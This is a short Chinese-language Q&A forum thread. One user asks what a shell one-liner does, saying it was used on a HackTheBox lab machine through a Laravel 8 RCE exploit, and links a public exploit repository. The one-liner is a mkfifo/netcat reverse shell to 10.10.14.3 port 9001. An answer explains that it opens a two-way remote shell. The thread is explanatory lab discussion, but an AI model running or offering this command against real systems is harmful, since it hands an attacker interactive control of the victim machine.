有人能解释一下这个 shellcode 吗?

有人能解释一下这个 shellcode 吗?
rm /tmp/f
mkfifo /tmp/f
cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f

它在 Horizo​​ntal HTB(laravel 8 RCE)上使用。

以下是漏洞利用代码:
https://github.com/nth347/CVE-2021-3129_exploit

答案1

它启动一个连接到 10.10.14.3 端口 9001 的反向 shell。与 /tmp/f 的业务是因为单独的 shell 管道只允许单向通信,但反向 shell 应该是双向的。

相关内容